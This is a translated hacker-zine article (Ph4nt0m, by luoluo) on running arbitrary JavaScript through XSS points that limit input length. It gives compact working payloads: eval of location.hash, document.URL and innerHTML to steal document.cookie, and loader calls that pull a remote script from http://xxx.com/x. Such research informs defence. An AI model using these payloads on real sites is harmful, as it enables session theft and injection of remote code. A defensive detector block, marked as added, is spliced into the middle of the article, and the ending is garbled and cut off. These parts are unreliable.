= Ph4nt0m Security Team =
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-----------=[ Break through the XSS character limit and execute any JS code ]=-----------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-------------------------------=[ By luoluo ]=-------------------------------=|
|=-------------------------=[ <luoluo # ph4nt0m.org> ]=-------------------------=|
|=--------------------------=[ <luoluo # 80sec.com> ]=--------------------------=|
|=---------------------------------------------------------------------------=|
[Directory]
1. Summary
2. Breakthrough Methods
2.1 Using other controllable data in the HTML context
2.2 Using data in the URL
2.3 Exploiting the JS context
2.4 Using browser features to pass data between cross-origin pages
2.4.1 document.referrer
2.4.2 Clipboard: clipboardData
2.4.3 Window name: window.name
2.5 Combining several methods
3. Postscript
4. References
1. Summary
Some XSS vulnerabilities cannot be exploited effectively because the number of characters is limited: all you can do is pop up a dialog box.
This article discusses how to break through the character limit to achieve effective exploitation, where "effective exploitation" means
running arbitrary JS without restriction. For cross-site researchers, studying whether XSS can still be exploited in such extreme cases is
a pleasure in itself; for product security engineers, an unrestricted exploit is probably the most convincing evidence to hand developers
when asking them to take these problems seriously and fix them.
There are many ways to break through, but the idea behind all of them is the same: execute data whose length is not limited.
2. Breakthrough Methods
2.1 Using other controllable data in the HTML context
If the HTML context of the page with the XSS vulnerability contains other data that the attacker controls, that data can be read through JS
and executed with eval, document.write, innerHTML and similar methods, which takes us past the XSS point's character limit.
The following example assumes that the contents of a div element are controllable but have been HTML encoded:
-- Code -------------------------------------------------------------------------
<div id="x">controllable, safe data</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
Because the XSS point limits the number of characters, all we can do there is pop up a box. Instead, the XSS payload is escape-encoded,
output as "safe" data into the controllable location, and then executed from the XSS point:
-- Code -------------------------------------------------------------------------
<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 28 + len(id)
Since there is no limit on the number of characters in x's contents, it can be used to execute arbitrary JavaScript.
2.2 Using data in the URL
What if the page has no controllable HTML-context data of the kind described in the previous section? Some data can always be controlled,
and the first thing that comes to mind is the URL. Put the code to be executed in a parameter at the end of the URL, then read it back
through document.URL, location.href and similar properties and execute it. Here we assume the code starts at the 80th character of the URL:
-- Code -------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1...&alert(document.cookie)
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 30
-- Code -------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 31
Of these two examples the first is shorter. Can it be shorter still? Looking through the String methods in the JavaScript reference,
you find that slice also cuts a string and, at five characters, is one character shorter than substr:
-- Code -------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 29
-- Code -------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 30
Is there no way to be shorter still? There is. Look at the location object reference in MSDN and you will find a hash member that returns
the data after the #, so we put the code to be executed after the # and fetch it through hash. Because the returned data starts with #,
slice only needs to skip a single character:
-- Code -------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1...#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 29
That is one character less than the previous example. Can it be shorter still?
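Every variant in sections 2.1 and 2.2 (and the cross-origin channels section 2.4 lists: document.referrer, window.name, clipboardData) has the same shape: an execution sink fed from a source whose length nobody limits. The following is an added example, not code from the original article: a small regex-based triage helper for code review that flags exactly those sink/source pairs, so a defender can locate the scripts that would turn a short XSS point into an unrestricted one. All names and samples in it are constructed for illustration.

```javascript
// Added example, not code from the original article: a regex-based triage helper
// that flags the sink/source pairs the article relies on. A finding means a script
// feeds data an attacker controls without a length limit (another element's innerHTML,
// document.URL, location.href/hash, document.referrer, window.name, clipboardData) into
// eval, document.write or an innerHTML assignment. It finds review candidates only.
const SOURCES = [
  { name: "document.URL",      re: /document\.URL\b/ },
  { name: "location.href",     re: /location\.href\b/ },
  { name: "location.hash",     re: /location\.hash\b/ },
  { name: "document.referrer", re: /document\.referrer\b/ },
  { name: "window.name",       re: /\b(?:window\.)?name\b/ },  // bare `name` is window.name
  { name: "clipboardData",     re: /clipboardData\b/ },
  { name: "element.innerHTML", re: /\.innerHTML\b/ },
];
const CALL_SINKS = ["eval", "document.write"];
// Text of a call's argument list, starting just after its "(" and ending at the matching ")";
// an unclosed call (as in some of the article's listings) takes the rest of the text.
function callArgument(src, start) {
  let depth = 1;
  for (let i = start; i < src.length; i++) {
    if (src[i] === "(") depth++;
    else if (src[i] === ")" && --depth === 0) return src.slice(start, i);
  }
  return src.slice(start);
}
// Scan one script; return [{ sink, source }] for every smuggling pattern found.
function findSmuggledSinks(js) {
  const src = js.replace(/\s+/g, " ");
  const findings = [];
  const check = (sink, expr) => {
    for (const s of SOURCES) if (s.re.test(expr)) findings.push({ sink, source: s.name });
  };
  for (const sink of CALL_SINKS) {
    const re = new RegExp("\\b" + sink.replace(".", "\\.") + "\\s*\\(", "g");
    for (let m; (m = re.exec(src)) !== null; ) check(sink, callArgument(src, m.index + m[0].length));
  }
  const assign = /\.innerHTML\s*=(?!=)([^;]*)/g;          // <element>.innerHTML = <expr>;
  for (let m; (m = assign.exec(src)) !== null; ) check("innerHTML=", m[1]);
  return findings;
}
// Constructed samples: the article's short payloads plus one benign snippet.
const SAMPLES = {
  divSmuggle:  "eval(unescape(x.innerHTML));",
  hashSmuggle: "eval(location.hash.slice(1));",
  refSmuggle:  "document.write(document.referrer.slice(30));",
  nameSink:    "el.innerHTML = name;",
  benign:      "eval('1+1'); el.innerHTML = escapeHtml(user.bio);",
};
```

Run it over the site's own helper functions too: a wrapper such as `$(id)` or a script loader hides the same sink behind a shorter name, which is precisely what section 2.3 exploits.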
2.3 Exploiting the JS context
Why is it so painful? Because the method and property names of JS and DHTML are far too long! Look at these "bad" names:
String.fromCharCode
getElementById
getElementsByTagName
document.write
XMLHttpRequest
...
Even developers do not want to type them more than once, so the front-end engineers of many sites wrap them in all kinds of
simplified functions:
-- Code -------------------------------------------------------------------------
function $(id){
    return document.getElementById(id);
}
-------------------------------------------------------------------------------
Such functions can also be used to shorten our payload. The example above is not the shortest route, though: both IE and FF support
referencing an element directly by its id. Some functions can be used to load our code directly:
-- Code -------------------------------------------------------------------------
function loads(url){
    // ... (body elided in the original: builds a script element whose src is url)
    document.body.appendChild(script);
}
<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
-------------------------------------------------------------------------------
Length: len(function name) + len(url) + 5
Of course, the shorter your URL, the better! Some functions even make HTTP requests for us:
-- Code -------------------------------------------------------------------------
function get(url){
    // ... (body elided in the original: issues a synchronous request through XMLHttpRequest x)
    return x.responseText;
}
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
-------------------------------------------------------------------------------
Length: len(function name) + len(url) + 11
Brother Tao pointed out that popular JS development frameworks also wrap up large and powerful libraries that can be called, for example:
jQuery
YUI
...
In summary, we can analyse the frameworks, objects, classes and functions already present in the JS context to shorten the payload
and execute arbitrary code beyond the length limit.
2.4 Using browser features to pass data between cross-origin pages
Although the same-origin policy imposes restrictions, the browser's feature design still leaves a small number of ways to pass data
across origins; we can use them to carry data from another page into the page on the XSS domain and execute it there.
2.4.1 document.referrer
An attacker can construct a page on their own domain that jumps to the XSS page with the payload carried in its URL; the XSS page
then obtains the code through referrer and executes it.
The page constructed by the attacker:
-- Code -------------------------------------------------------------------------
Http://www.a.com/attack.html ?... & Alert (Alibaba E